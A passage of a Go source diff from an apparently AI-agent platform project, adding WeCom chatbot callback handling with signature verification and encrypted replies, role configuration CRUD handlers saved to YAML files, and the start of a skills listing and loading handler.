获取签名参数(加密模式回复时需要用到) + timestamp := c.Query("timestamp") + nonce := c.Query("nonce") + msgSignature := c.Query("msg_signature") + + // 先读取请求体,后续解析/签名验证都会用到 + bodyRaw, err := io.ReadAll(c.Request.Body) + if err != nil { + h.logger.Warn("企业微信 POST 读取请求体失败", zap.Error(err)) + c.String(http.StatusOK, "") + return + } + h.logger.Debug("企业微信 POST 收到请求", zap.String("body", string(bodyRaw))) + + // 验证请求签名防止伪造。企业微信签名算法同 URL 验证,使用 token、timestamp、nonce、 Encrypt 四个字段 + // 若配置了 Token 则必须校验签名,避免未授权请求触发 Agent(防止平台被接管) + token := h.config.Robots.Wecom.Token + if token != "" { + if msgSignature == "" { + h.logger.Warn("企业微信 POST 缺少签名,已拒绝(需配置 token 并确保回调携带 msg_signature)") + c.String(http.StatusOK, "") + return + } + var tmp wecomXML + if err := xml.Unmarshal(bodyRaw, &tmp); err != nil { + h.logger.Warn("企业微信 POST 签名验证前解析 XML 失败", zap.Error(err)) + c.String(http.StatusOK, "") + return + } + expected := h.signWecomRequest(token, timestamp, nonce, tmp.Encrypt) + if expected != msgSignature { + h.logger.Warn("企业微信 POST 签名验证失败", zap.String("expected", expected), zap.String("got", msgSignature)) + c.String(http.StatusOK, "") + return + } + } + + var body wecomXML + if err := xml.Unmarshal(bodyRaw, &body); err != nil { + h.logger.Warn("企业微信 POST 解析 XML 失败", zap.Error(err)) + c.String(http.StatusOK, "") + return + } + h.logger.Debug("企业微信 XML 解析成功", zap.String("ToUserName", body.ToUserName), zap.String("FromUserName", body.FromUserName), zap.String("MsgType", body.MsgType), zap.String("Content", body.Content), zap.String("Encrypt", body.Encrypt)) + + // 保存企业 ID(用于明文模式回复) + enterpriseID := body.ToUserName + + // 加密模式:先解密再解析内层 XML + if body.Encrypt != "" && h.config.Robots.Wecom.EncodingAESKey != "" { + h.logger.Debug("企业微信进入加密模式解密流程") + decrypted, err := wecomDecrypt(h.config.Robots.Wecom.EncodingAESKey, body.Encrypt) + if err != nil { + h.logger.Warn("企业微信消息解密失败", zap.Error(err)) + c.String(http.StatusOK, "") + return + } + h.logger.Debug("企业微信解密成功", zap.String("decrypted", string(decrypted))) + if err := xml.Unmarshal(decrypted, &body); err != nil { + h.logger.Warn("企业微信解密后 XML 解析失败", zap.Error(err)) + c.String(http.StatusOK, "") + return + } + h.logger.Debug("企业微信内层 XML 解析成功", zap.String("FromUserName", body.FromUserName), zap.String("Content", body.Content)) + } + + tenantKey := strings.TrimSpace(enterpriseID) + if tenantKey == "" { + tenantKey = strings.TrimSpace(h.config.Robots.Wecom.CorpID) + } + if tenantKey == "" { + tenantKey = "default" + } + rawUserID := strings.TrimSpace(body.FromUserName) + replyUserID := rawUserID + userID := "" + if rawUserID != "" { + userID = "t:" + tenantKey + "|u:" + rawUserID + } + text := strings.TrimSpace(body.Content) + if userID == "" { + h.logger.Warn("企业微信消息缺少可用用户标识,已忽略") + c.String(http.StatusOK, "success") + return + } + + // 限制回复内容长度(企业微信限制 2048 字节) + maxReplyLen := 2000 + limitReply := func(s string) string { + if len(s) > maxReplyLen { + return s[:maxReplyLen] + "\n\n(内容过长,已截断)" + } + return s + } + + if body.MsgType != "text" { + h.logger.Debug("企业微信收到非文本消息", zap.String("MsgType", body.MsgType)) + h.sendWecomReply(c, replyUserID, enterpriseID, limitReply("暂仅支持文本消息,请发送文字。"), timestamp, nonce) + return + } + + // 文本消息:先判断是否为内置命令(如 帮助/列表/新对话 等),这类命令处理很快,可以直接走被动回复,避免依赖主动发送 API。 + if cmdReply, ok := h.handleRobotCommand("wecom", userID, text); ok { + h.logger.Debug("企业微信收到命令消息,走被动回复", zap.String("userID", userID), zap.String("text", text)) + h.sendWecomReply(c, replyUserID, enterpriseID, limitReply(cmdReply), timestamp, nonce) + return + } + + h.logger.Debug("企业微信开始处理消息(异步 AI)", zap.String("userID", userID), zap.String("text", text)) + + // 企业微信被动回复有 5 秒超时限制,而 AI 调用通常超过该时长。 + // 这里采用推荐做法:立即返回 success(或空串),然后通过主动发送接口推送完整回复。 + c.String(http.StatusOK, "success") + + // 异步处理消息并通过企业微信主动消息接口发送结果 + go func() { + reply := h.HandleMessage("wecom", userID, text) + reply = limitReply(reply) + h.logger.Debug("企业微信消息处理完成", zap.String("userID", userID), zap.String("reply", reply)) + // 调用企业微信 API 主动发送消息 + h.sendWecomMessageViaAPI(rawUserID, enterpriseID, reply) + }() +} + +// sendWecomReply 发送企业微信回复(加密模式自动加密) +// 参数:toUser=用户 ID, fromUser=企业 ID(明文模式)/CorpID(加密模式), content=回复内容,timestamp/nonce=请求参数 +func (h *RobotHandler) sendWecomReply(c *gin.Context, toUser, fromUser, content, timestamp, nonce string) { + // 加密模式:判断 EncodingAESKey 是否配置 + if h.config.Robots.Wecom.EncodingAESKey != "" { + // 加密模式使用 CorpID 进行加密 + corpID := h.config.Robots.Wecom.CorpID + if corpID == "" { + h.logger.Warn("企业微信加密模式缺少 CorpID 配置") + c.String(http.StatusOK, "") + return + } + + // 构造完整的明文 XML 回复(格式严格按企业微信文档要求) + plainResp := fmt.Sprintf(` + + +%d + + +`, toUser, fromUser, time.Now().Unix(), content) + + encrypted, err := wecomEncrypt(h.config.Robots.Wecom.EncodingAESKey, plainResp, corpID) + if err != nil { + h.logger.Warn("企业微信回复加密失败", zap.Error(err)) + c.String(http.StatusOK, "") + return + } + // 使用请求中的 timestamp/nonce 生成签名(企业微信要求回复时使用与请求相同的 timestamp 和 nonce) + msgSignature := h.signWecomRequest(h.config.Robots.Wecom.Token, timestamp, nonce, encrypted) + + h.logger.Debug("企业微信发送加密回复", + zap.String("Encrypt", encrypted[:50]+"..."), + zap.String("MsgSignature", msgSignature), + zap.String("TimeStamp", timestamp), + zap.String("Nonce", nonce)) + + // 加密模式仅返回 4 个核心字段(企业微信官方要求) + xmlResp := fmt.Sprintf(``, encrypted, msgSignature, timestamp, nonce) + // also log the final response body so we can cross-check with the + // network traffic or developer console + h.logger.Debug("企业微信加密回复包", zap.String("xml", xmlResp)) + // for additional confidence, decrypt the payload ourselves and log it + if dec, err2 := wecomDecrypt(h.config.Robots.Wecom.EncodingAESKey, encrypted); err2 == nil { + h.logger.Debug("企业微信加密回复解密检查", zap.String("plain", string(dec))) + } else { + h.logger.Warn("企业微信加密回复解密检查失败", zap.Error(err2)) + } + + // 使用 c.Writer.Write 直接写入响应,避免 c.String 的转义问题 + c.Writer.WriteHeader(http.StatusOK) + // use text/xml as that's what WeCom examples show + c.Writer.Header().Set("Content-Type", "text/xml; charset=utf-8") + _, _ = c.Writer.Write([]byte(xmlResp)) + h.logger.Debug("企业微信加密回复已发送") + return + } + + // 明文模式 + h.logger.Debug("企业微信发送明文回复", zap.String("ToUserName", toUser), zap.String("FromUserName", fromUser), zap.String("Content", content[:50]+"...")) + + // 手动构造 XML 响应(使用 CDATA 包裹所有字段,并包含 AgentID) + xmlResp := fmt.Sprintf(` + + +%d + + +`, toUser, fromUser, time.Now().Unix(), content) + + // log the exact plaintext response for debugging + h.logger.Debug("企业微信明文回复包", zap.String("xml", xmlResp)) + + // use text/xml as recommended by WeCom docs + c.Header("Content-Type", "text/xml; charset=utf-8") + c.String(http.StatusOK, xmlResp) + h.logger.Debug("企业微信明文回复已发送") +} + +// —————— 测试接口(需登录,用于验证机器人逻辑,无需钉钉/飞书客户端) —————— + +// RobotTestRequest 模拟机器人消息请求 +type RobotTestRequest struct { + Platform string `json:"platform"` // 如 "dingtalk"、"lark"、"wecom" + UserID string `json:"user_id"` + Text string `json:"text"` +} + +// HandleRobotTest 供本地验证:POST JSON { "platform", "user_id", "text" },返回 { "reply": "..." } +func (h *RobotHandler) HandleRobotTest(c *gin.Context) { + var req RobotTestRequest + if err := c.ShouldBindJSON(&req); err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": "请求体需为 JSON,包含 platform、user_id、text"}) + return + } + platform := strings.TrimSpace(req.Platform) + if platform == "" { + platform = "test" + } + userID := strings.TrimSpace(req.UserID) + if userID == "" { + userID = "test_user" + } + reply := h.HandleMessage(platform, userID, req.Text) + c.JSON(http.StatusOK, gin.H{"reply": reply}) +} + +// sendWecomMessageViaAPI 通过企业微信 API 主动发送消息(用于异步处理后的结果发送) +func (h *RobotHandler) sendWecomMessageViaAPI(toUser, toParty, content string) { + if !h.config.Robots.Wecom.Enabled { + return + } + + secret := h.config.Robots.Wecom.Secret + corpID := h.config.Robots.Wecom.CorpID + agentID := h.config.Robots.Wecom.AgentID + + if secret == "" || corpID == "" { + h.logger.Warn("企业微信主动 API 缺少 secret 或 corpID 配置") + return + } + + // 第 1 步:获取 access_token + tokenURL := fmt.Sprintf("https://qyapi.weixin.qq.com/cgi-bin/gettoken?corpid=%s&corpsecret=%s", corpID, secret) + resp, err := http.Get(tokenURL) + if err != nil { + h.logger.Warn("企业微信获取 token 失败", zap.Error(err)) + return + } + defer resp.Body.Close() + + var tokenResp struct { + AccessToken string `json:"access_token"` + ErrCode int `json:"errcode"` + ErrMsg string `json:"errmsg"` + } + if err := json.NewDecoder(resp.Body).Decode(&tokenResp); err != nil { + h.logger.Warn("企业微信 token 响应解析失败", zap.Error(err)) + return + } + if tokenResp.ErrCode != 0 { + h.logger.Warn("企业微信 token 获取错误", zap.String("errmsg", tokenResp.ErrMsg), zap.Int("errcode", tokenResp.ErrCode)) + return + } + + // 第 2 步:构造发送消息请求 + msgReq := map[string]interface{}{ + "touser": toUser, + "msgtype": "text", + "agentid": agentID, + "text": map[string]interface{}{ + "content": content, + }, + } + + msgBody, err := json.Marshal(msgReq) + if err != nil { + h.logger.Warn("企业微信消息序列化失败", zap.Error(err)) + return + } + + // 第 3 步:发送消息 + sendURL := fmt.Sprintf("https://qyapi.weixin.qq.com/cgi-bin/message/send?access_token=%s", tokenResp.AccessToken) + msgResp, err := http.Post(sendURL, "application/json", bytes.NewReader(msgBody)) + if err != nil { + h.logger.Warn("企业微信主动发送消息失败", zap.Error(err)) + return + } + defer msgResp.Body.Close() + + var sendResp struct { + ErrCode int `json:"errcode"` + ErrMsg string `json:"errmsg"` + InvalidUser string `json:"invaliduser"` + MsgID string `json:"msgid"` + } + if err := json.NewDecoder(msgResp.Body).Decode(&sendResp); err != nil { + h.logger.Warn("企业微信发送响应解析失败", zap.Error(err)) + return + } + + if sendResp.ErrCode == 0 { + h.logger.Debug("企业微信主动发送消息成功", zap.String("msgid", sendResp.MsgID)) + } else { + h.logger.Warn("企业微信主动发送消息失败", zap.String("errmsg", sendResp.ErrMsg), zap.Int("errcode", sendResp.ErrCode), zap.String("invaliduser", sendResp.InvalidUser)) + } +} + +// —————— 钉钉 —————— + +// HandleDingtalkPOST 钉钉事件回调(流式接入等);当前为占位,返回 200 +func (h *RobotHandler) HandleDingtalkPOST(c *gin.Context) { + if !h.config.Robots.Dingtalk.Enabled { + c.JSON(http.StatusOK, gin.H{}) + return + } + // 钉钉流式/事件回调格式需按官方文档解析并异步回复,此处仅返回 200 + c.JSON(http.StatusOK, gin.H{"message": "ok"}) +} + +// —————— 飞书 —————— + +// HandleLarkPOST 飞书事件回调;当前为占位,返回 200;验证时需返回 challenge +func (h *RobotHandler) HandleLarkPOST(c *gin.Context) { + if !h.config.Robots.Lark.Enabled { + c.JSON(http.StatusOK, gin.H{}) + return + } + var body struct { + Challenge string `json:"challenge"` + } + if err := c.ShouldBindJSON(&body); err == nil && body.Challenge != "" { + c.JSON(http.StatusOK, gin.H{"challenge": body.Challenge}) + return + } + c.JSON(http.StatusOK, gin.H{}) +} diff --git a/internal/handler/role.go b/internal/handler/role.go new file mode 100644 index 00000000..1c061256 --- /dev/null +++ b/internal/handler/role.go @@ -0,0 +1,469 @@ +package handler + +import ( + "fmt" + "net/http" + "os" + "path/filepath" + "regexp" + "strings" + + "cyberstrike-ai/internal/audit" + "cyberstrike-ai/internal/config" + + "gopkg.in/yaml.v3" + + "github.com/gin-gonic/gin" + "go.uber.org/zap" +) + +// RoleHandler 角色处理器 +type RoleHandler struct { + config *config.Config + configPath string + logger *zap.Logger + audit *audit.Service +} + +// SetAudit wires platform audit logging. +func (h *RoleHandler) SetAudit(s *audit.Service) { + h.audit = s +} + +// NewRoleHandler 创建新的角色处理器 +func NewRoleHandler(cfg *config.Config, configPath string, logger *zap.Logger) *RoleHandler { + return &RoleHandler{ + config: cfg, + configPath: configPath, + logger: logger, + } +} + +// GetRoles 获取所有角色 +func (h *RoleHandler) GetRoles(c *gin.Context) { + if h.config.Roles == nil { + h.config.Roles = make(map[string]config.RoleConfig) + } + + roles := make([]config.RoleConfig, 0, len(h.config.Roles)) + for key, role := range h.config.Roles { + // 确保角色的key与name一致 + if role.Name == "" { + role.Name = key + } + roles = append(roles, role) + } + + c.JSON(http.StatusOK, gin.H{ + "roles": roles, + }) +} + +// GetRole 获取单个角色 +func (h *RoleHandler) GetRole(c *gin.Context) { + roleName := c.Param("name") + if roleName == "" { + c.JSON(http.StatusBadRequest, gin.H{"error": "角色名称不能为空"}) + return + } + + if h.config.Roles == nil { + c.JSON(http.StatusNotFound, gin.H{"error": "角色不存在"}) + return + } + + role, exists := h.config.Roles[roleName] + if !exists { + c.JSON(http.StatusNotFound, gin.H{"error": "角色不存在"}) + return + } + + // 确保角色的name与key一致 + if role.Name == "" { + role.Name = roleName + } + + c.JSON(http.StatusOK, gin.H{ + "role": role, + }) +} + +// UpdateRole 更新角色 +func (h *RoleHandler) UpdateRole(c *gin.Context) { + roleName := c.Param("name") + if roleName == "" { + c.JSON(http.StatusBadRequest, gin.H{"error": "角色名称不能为空"}) + return + } + + var req config.RoleConfig + if err := c.ShouldBindJSON(&req); err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": "无效的请求参数: " + err.Error()}) + return + } + + // 确保角色名称与请求中的name一致 + if req.Name == "" { + req.Name = roleName + } + + // 初始化Roles map + if h.config.Roles == nil { + h.config.Roles = make(map[string]config.RoleConfig) + } + + // 删除所有与角色name相同但key不同的旧角色(避免重复) + // 使用角色name作为key,确保唯一性 + finalKey := req.Name + keysToDelete := make([]string, 0) + for key := range h.config.Roles { + // 如果key与最终的key不同,但name相同,则标记为删除 + if key != finalKey { + role := h.config.Roles[key] + // 确保角色的name字段正确设置 + if role.Name == "" { + role.Name = key + } + if role.Name == req.Name { + keysToDelete = append(keysToDelete, key) + } + } + } + // 删除旧的角色 + for _, key := range keysToDelete { + delete(h.config.Roles, key) + h.logger.Info("删除重复的角色", zap.String("oldKey", key), zap.String("name", req.Name)) + } + + // 如果当前更新的key与最终key不同,也需要删除旧的 + if roleName != finalKey { + delete(h.config.Roles, roleName) + } + + // 如果角色名称改变,需要删除旧文件 + if roleName != finalKey { + configDir := filepath.Dir(h.configPath) + rolesDir := h.config.RolesDir + if rolesDir == "" { + rolesDir = "roles" // 默认目录 + } + + // 如果是相对路径,相对于配置文件所在目录 + if !filepath.IsAbs(rolesDir) { + rolesDir = filepath.Join(configDir, rolesDir) + } + + // 删除旧的角色文件 + oldSafeFileName := sanitizeFileName(roleName) + oldRoleFileYaml := filepath.Join(rolesDir, oldSafeFileName+".yaml") + oldRoleFileYml := filepath.Join(rolesDir, oldSafeFileName+".yml") + + if _, err := os.Stat(oldRoleFileYaml); err == nil { + if err := os.Remove(oldRoleFileYaml); err != nil { + h.logger.Warn("删除旧角色配置文件失败", zap.String("file", oldRoleFileYaml), zap.Error(err)) + } + } + if _, err := os.Stat(oldRoleFileYml); err == nil { + if err := os.Remove(oldRoleFileYml); err != nil { + h.logger.Warn("删除旧角色配置文件失败", zap.String("file", oldRoleFileYml), zap.Error(err)) + } + } + } + + // 使用角色name作为key来保存(确保唯一性) + h.config.Roles[finalKey] = req + + // 保存配置到文件 + if err := h.saveConfig(); err != nil { + h.logger.Error("保存配置失败", zap.Error(err)) + c.JSON(http.StatusInternalServerError, gin.H{"error": "保存配置失败: " + err.Error()}) + return + } + + h.logger.Info("更新角色", zap.String("oldKey", roleName), zap.String("newKey", finalKey), zap.String("name", req.Name)) + if h.audit != nil { + h.audit.RecordOK(c, "role", "update", "更新角色", "role", finalKey, map[string]interface{}{"name": req.Name}) + } + c.JSON(http.StatusOK, gin.H{ + "message": "角色已更新", + "role": req, + }) +} + +// CreateRole 创建新角色 +func (h *RoleHandler) CreateRole(c *gin.Context) { + var req config.RoleConfig + if err := c.ShouldBindJSON(&req); err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": "无效的请求参数: " + err.Error()}) + return + } + + if req.Name == "" { + c.JSON(http.StatusBadRequest, gin.H{"error": "角色名称不能为空"}) + return + } + + // 初始化Roles map + if h.config.Roles == nil { + h.config.Roles = make(map[string]config.RoleConfig) + } + + // 检查角色是否已存在 + if _, exists := h.config.Roles[req.Name]; exists { + c.JSON(http.StatusBadRequest, gin.H{"error": "角色已存在"}) + return + } + + // 创建角色(默认启用) + if !req.Enabled { + req.Enabled = true + } + + h.config.Roles[req.Name] = req + + // 保存配置到文件 + if err := h.saveConfig(); err != nil { + h.logger.Error("保存配置失败", zap.Error(err)) + c.JSON(http.StatusInternalServerError, gin.H{"error": "保存配置失败: " + err.Error()}) + return + } + + h.logger.Info("创建角色", zap.String("roleName", req.Name)) + if h.audit != nil { + h.audit.RecordOK(c, "role", "create", "创建角色", "role", req.Name, nil) + } + c.JSON(http.StatusOK, gin.H{ + "message": "角色已创建", + "role": req, + }) +} + +// DeleteRole 删除角色 +func (h *RoleHandler) DeleteRole(c *gin.Context) { + roleName := c.Param("name") + if roleName == "" { + c.JSON(http.StatusBadRequest, gin.H{"error": "角色名称不能为空"}) + return + } + + if h.config.Roles == nil { + c.JSON(http.StatusNotFound, gin.H{"error": "角色不存在"}) + return + } + + if _, exists := h.config.Roles[roleName]; !exists { + c.JSON(http.StatusNotFound, gin.H{"error": "角色不存在"}) + return + } + + // 不允许删除"默认"角色 + if roleName == "默认" { + c.JSON(http.StatusBadRequest, gin.H{"error": "不能删除默认角色"}) + return + } + + delete(h.config.Roles, roleName) + + // 删除对应的角色文件 + configDir := filepath.Dir(h.configPath) + rolesDir := h.config.RolesDir + if rolesDir == "" { + rolesDir = "roles" // 默认目录 + } + + // 如果是相对路径,相对于配置文件所在目录 + if !filepath.IsAbs(rolesDir) { + rolesDir = filepath.Join(configDir, rolesDir) + } + + // 尝试删除角色文件(.yaml 和 .yml) + safeFileName := sanitizeFileName(roleName) + roleFileYaml := filepath.Join(rolesDir, safeFileName+".yaml") + roleFileYml := filepath.Join(rolesDir, safeFileName+".yml") + + // 删除 .yaml 文件(如果存在) + if _, err := os.Stat(roleFileYaml); err == nil { + if err := os.Remove(roleFileYaml); err != nil { + h.logger.Warn("删除角色配置文件失败", zap.String("file", roleFileYaml), zap.Error(err)) + } else { + h.logger.Info("已删除角色配置文件", zap.String("file", roleFileYaml)) + } + } + + // 删除 .yml 文件(如果存在) + if _, err := os.Stat(roleFileYml); err == nil { + if err := os.Remove(roleFileYml); err != nil { + h.logger.Warn("删除角色配置文件失败", zap.String("file", roleFileYml), zap.Error(err)) + } else { + h.logger.Info("已删除角色配置文件", zap.String("file", roleFileYml)) + } + } + + h.logger.Info("删除角色", zap.String("roleName", roleName)) + if h.audit != nil { + h.audit.RecordOK(c, "role", "delete", "删除角色", "role", roleName, nil) + } + c.JSON(http.StatusOK, gin.H{ + "message": "角色已删除", + }) +} + +// saveConfig 保存配置到目录中的文件 +func (h *RoleHandler) saveConfig() error { + configDir := filepath.Dir(h.configPath) + rolesDir := h.config.RolesDir + if rolesDir == "" { + rolesDir = "roles" // 默认目录 + } + + // 如果是相对路径,相对于配置文件所在目录 + if !filepath.IsAbs(rolesDir) { + rolesDir = filepath.Join(configDir, rolesDir) + } + + // 确保目录存在 + if err := os.MkdirAll(rolesDir, 0755); err != nil { + return fmt.Errorf("创建角色目录失败: %w", err) + } + + // 保存每个角色到独立的文件 + if h.config.Roles != nil { + for roleName, role := range h.config.Roles { + // 确保角色名称正确设置 + if role.Name == "" { + role.Name = roleName + } + + // 使用角色名称作为文件名(安全化文件名,避免特殊字符) + safeFileName := sanitizeFileName(role.Name) + roleFile := filepath.Join(rolesDir, safeFileName+".yaml") + + // 将角色配置序列化为YAML + roleData, err := yaml.Marshal(&role) + if err != nil { + h.logger.Error("序列化角色配置失败", zap.String("role", roleName), zap.Error(err)) + continue + } + + // 处理icon字段:确保包含\U的icon值被引号包围(YAML需要引号才能正确解析Unicode转义) + roleDataStr := string(roleData) + if role.Icon != "" && strings.HasPrefix(role.Icon, "\\U") { + // 匹配 icon: \UXXXXXXXX 格式(没有引号),排除已经有引号的情况 + // 使用负向前瞻确保后面没有引号,或者直接匹配没有引号的情况 + re := regexp.MustCompile(`(?m)^(icon:\s+)(\\U[0-9A-F]{8})(\s*)$`) + roleDataStr = re.ReplaceAllString(roleDataStr, `${1}"${2}"${3}`) + roleData = []byte(roleDataStr) + } + + // 写入文件 + if err := os.WriteFile(roleFile, roleData, 0644); err != nil { + h.logger.Error("保存角色配置文件失败", zap.String("role", roleName), zap.String("file", roleFile), zap.Error(err)) + continue + } + + h.logger.Info("角色配置已保存到文件", zap.String("role", roleName), zap.String("file", roleFile)) + } + } + + return nil +} + +// sanitizeFileName 将角色名称转换为安全的文件名 +func sanitizeFileName(name string) string { + // 替换可能不安全的字符 + replacer := map[rune]string{ + '/': "_", + '\\': "_", + ':': "_", + '*': "_", + '?': "_", + '"': "_", + '<': "_", + '>': "_", + '|': "_", + ' ': "_", + } + + var result []rune + for _, r := range name { + if replacement, ok := replacer[r]; ok { + result = append(result, []rune(replacement)...) + } else { + result = append(result, r) + } + } + + fileName := string(result) + // 如果文件名为空,使用默认名称 + if fileName == "" { + fileName = "role" + } + + return fileName +} + +// updateRolesConfig 更新角色配置 +func updateRolesConfig(doc *yaml.Node, cfg config.RolesConfig) { + root := doc.Content[0] + rolesNode := ensureMap(root, "roles") + + // 清空现有角色 + if rolesNode.Kind == yaml.MappingNode { + rolesNode.Content = nil + } + + // 添加新角色(使用name作为key,确保唯一性) + if cfg.Roles != nil { + // 先建立一个以name为key的map,去重(保留最后一个) + rolesByName := make(map[string]config.RoleConfig) + for roleKey, role := range cfg.Roles { + // 确保角色的name字段正确设置 + if role.Name == "" { + role.Name = roleKey + } + // 使用name作为最终key,如果有多个key对应相同的name,只保留最后一个 + rolesByName[role.Name] = role + } + + // 将去重后的角色写入YAML + for roleName, role := range rolesByName { + roleNode := ensureMap(rolesNode, roleName) + setStringInMap(roleNode, "name", role.Name) + setStringInMap(roleNode, "description", role.Description) + setStringInMap(roleNode, "user_prompt", role.UserPrompt) + if role.Icon != "" { + setStringInMap(roleNode, "icon", role.Icon) + } + setBoolInMap(roleNode, "enabled", role.Enabled) + + // 添加工具列表(优先使用tools字段) + if len(role.Tools) > 0 { + toolsNode := ensureArray(roleNode, "tools") + toolsNode.Content = nil + for _, toolKey := range role.Tools { + toolNode := &yaml.Node{Kind: yaml.ScalarNode, Tag: "!!str", Value: toolKey} + toolsNode.Content = append(toolsNode.Content, toolNode) + } + } else if len(role.MCPs) > 0 { + // 向后兼容:如果没有tools但有mcps,保存mcps + mcpsNode := ensureArray(roleNode, "mcps") + mcpsNode.Content = nil + for _, mcpName := range role.MCPs { + mcpNode := &yaml.Node{Kind: yaml.ScalarNode, Tag: "!!str", Value: mcpName} + mcpsNode.Content = append(mcpsNode.Content, mcpNode) + } + } + } + } +} + +// ensureArray 确保数组中存在指定key的数组节点 +func ensureArray(parent *yaml.Node, key string) *yaml.Node { + _, valueNode := ensureKeyValue(parent, key) + if valueNode.Kind != yaml.SequenceNode { + valueNode.Kind = yaml.SequenceNode + valueNode.Tag = "!!seq" + valueNode.Content = nil + } + return valueNode +} diff --git a/internal/handler/skills.go b/internal/handler/skills.go new file mode 100644 index 00000000..4246c297 --- /dev/null +++ b/internal/handler/skills.go @@ -0,0 +1,710 @@ +package handler + +import ( + "fmt" + "net/http" + "os" + "path/filepath" + "regexp" + "strings" + + "cyberstrike-ai/internal/audit" + "cyberstrike-ai/internal/config" + "cyberstrike-ai/internal/database" + "cyberstrike-ai/internal/skillpackage" + + "github.com/gin-gonic/gin" + "go.uber.org/zap" + "gopkg.in/yaml.v3" +) + +// SkillsHandler Skills处理器(磁盘 + Eino 规范;运行时由 Eino ADK skill 中间件加载) +type SkillsHandler struct { + config *config.Config + configPath string + logger *zap.Logger + db *database.DB // 数据库连接(遗留统计;MCP list/read 已移除) + audit *audit.Service +} + +// SetAudit wires platform audit logging. +func (h *SkillsHandler) SetAudit(s *audit.Service) { + h.audit = s +} + +// NewSkillsHandler 创建新的Skills处理器 +func NewSkillsHandler(cfg *config.Config, configPath string, logger *zap.Logger) *SkillsHandler { + return &SkillsHandler{ + config: cfg, + configPath: configPath, + logger: logger, + } +} + +func (h *SkillsHandler) skillsRootAbs() string { + skillsDir := h.config.SkillsDir + if skillsDir == "" { + skillsDir = "skills" + } + configDir := filepath.Dir(h.configPath) + if !filepath.IsAbs(skillsDir) { + skillsDir = filepath.Join(configDir, skillsDir) + } + return skillsDir +} + +// SetDB 设置数据库连接(用于获取调用统计) +func (h *SkillsHandler) SetDB(db *database.DB) { + h.db = db +} + +// GetSkills 获取所有skills列表(支持分页和搜索) +func (h *SkillsHandler) GetSkills(c *gin.Context) { + allSummaries, err := skillpackage.ListSkillSummaries(h.skillsRootAbs()) + if err != nil { + h.logger.Error("获取skills列表失败", zap.Error(err)) + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + + searchKeyword := strings.TrimSpace(c.Query("search")) + + allSkillsInfo := make([]map[string]interface{}, 0, len(allSummaries)) + for _, s := range allSummaries { + skillInfo := map[string]interface{}{ + "id": s.ID, + "name": s.Name, + "dir_name": s.DirName, + "description": s.Description, + "version": s.Version, + "path": s.Path, + "tags": s.Tags, + "triggers": s.Triggers, + "script_count": s.ScriptCount, + "file_count": s.FileCount, + "progressive": s.Progressive, + "file_size": s.FileSize, + "mod_time": s.ModTime, + } + allSkillsInfo = append(allSkillsInfo, skillInfo) + } + + filteredSkillsInfo := allSkillsInfo + if searchKeyword != "" { + keywordLower := strings.ToLower(searchKeyword) + filteredSkillsInfo = make([]map[string]interface{}, 0) + for _, skillInfo := range allSkillsInfo { + id := strings.ToLower(fmt.Sprintf("%v", skillInfo["id"])) + name := strings.ToLower(fmt.Sprintf("%v", skillInfo["name"])) + description := strings.ToLower(fmt.Sprintf("%v", skillInfo["description"])) + path := strings.ToLower(fmt.Sprintf("%v", skillInfo["path"])) + version := strings.ToLower(fmt.Sprintf("%v", skillInfo["version"])) + tagsJoined := "" + if tags, ok := skillInfo["tags"].([]string); ok { + tagsJoined = strings.ToLower(strings.Join(tags, " ")) + } + trigJoined := "" + if tr, ok := skillInfo["triggers"].([]string); ok { + trigJoined = strings.ToLower(strings.Join(tr, " ")) + } + if strings.Contains(id, keywordLower) || + strings.Contains(name, keywordLower) || + strings.Contains(description, keywordLower) || + strings.Contains(path, keywordLower) || + strings.Contains(version, keywordLower) || + strings.Contains(tagsJoined, keywordLower) || + strings.Contains(trigJoined, keywordLower) { + filteredSkillsInfo = append(filteredSkillsInfo, skillInfo) + } + } + } + + // 分页参数 + limit := 20 // 默认每页20条 + offset := 0 + if limitStr := c.Query("limit"); limitStr != "" { + if parsed, err := parseInt(limitStr); err == nil && parsed > 0 { + // 允许更大的limit用于搜索场景,但设置一个合理的上限(10000) + if parsed <= 10000 { + limit = parsed + } else { + limit = 10000 + } + } + } + if offsetStr := c.Query("offset"); offsetStr != "" { + if parsed, err := parseInt(offsetStr); err == nil && parsed >= 0 { + offset = parsed + } + } + + // 计算分页范围 + total := len(filteredSkillsInfo) + start := offset + end := offset + limit + if start > total { + start = total + } + if end > total { + end = total + } + + // 获取当前页的skill列表 + var paginatedSkillsInfo []map[string]interface{} + if start < end { + paginatedSkillsInfo = filteredSkillsInfo[start:end] + } else { + paginatedSkillsInfo = []map[string]interface{}{} + } + + c.JSON(http.StatusOK, gin.H{ + "skills": paginatedSkillsInfo, + "total": total, + "limit": limit, + "offset": offset, + }) +} + +// GetSkill 获取单个skill的详细信息 +func (h *SkillsHandler) GetSkill(c *gin.Context) { + skillName := c.Param("name") + if skillName == "" { + c.JSON(http.StatusBadRequest, gin.H{"error": "skill名称不能为空"}) + return + } + + resPath := strings.TrimSpace(c.Query("resource_path")) + if resPath == "" { + resPath = strings.TrimSpace(c.Query("skill_script_path")) + } + if resPath != "" { + content, err := skillpackage.ReadScriptText(h.skillsRootAbs(), skillName, resPath, 0) + if err != nil { + h.logger.Warn("读取skill资源失败", zap.String("skill", skillName), zap.String("path", resPath), zap.Error(err)) + c.JSON(http.StatusNotFound, gin.H{"error": err.Error()}) + return + } + c.JSON(http.StatusOK, gin.H{ + "skill": map[string]interface{}{ + "id": skillName, + }, + "resource": map[string]interface{}{ + "path": resPath, + "content": content, + }, + }) + return + } + + depthStr := strings.ToLower(strings.TrimSpace(c.DefaultQuery("depth", "full"))) + section := strings.TrimSpace(c.Query("section")) + opt := skillpackage.LoadOptions{Section: section} + switch depthStr { + case "summary": + opt.Depth = "summary" + case "full", "": + opt.Depth = "full" + default: + c.JSON(http.StatusBadRequest, gin.H{"error": "depth 仅支持 summary 或 full"}) + return + } + + skill, err := skillpackage.LoadSkill(h.skillsRootAbs(), skillName, opt) + if err != nil { + h.logger.Warn("加载skill失败", zap.String("skill", skillName), zap.Error(err)) + c.JSON(http.StatusNotFound, gin.H{"error": "skill不存在: " + err.Error()}) + return + } + + skillPath := skill.Path + skillFile := filepath.Join(skillPath, "SKILL.md") + + fileInfo, _ := os.Stat(skillFile) + var fileSize int64 + var modTime string + if fileInfo != nil { + fileSize = fileInfo.Size() + modTime = fileInfo.ModTime().Format("2006-01-02 15:04:05") + } + + 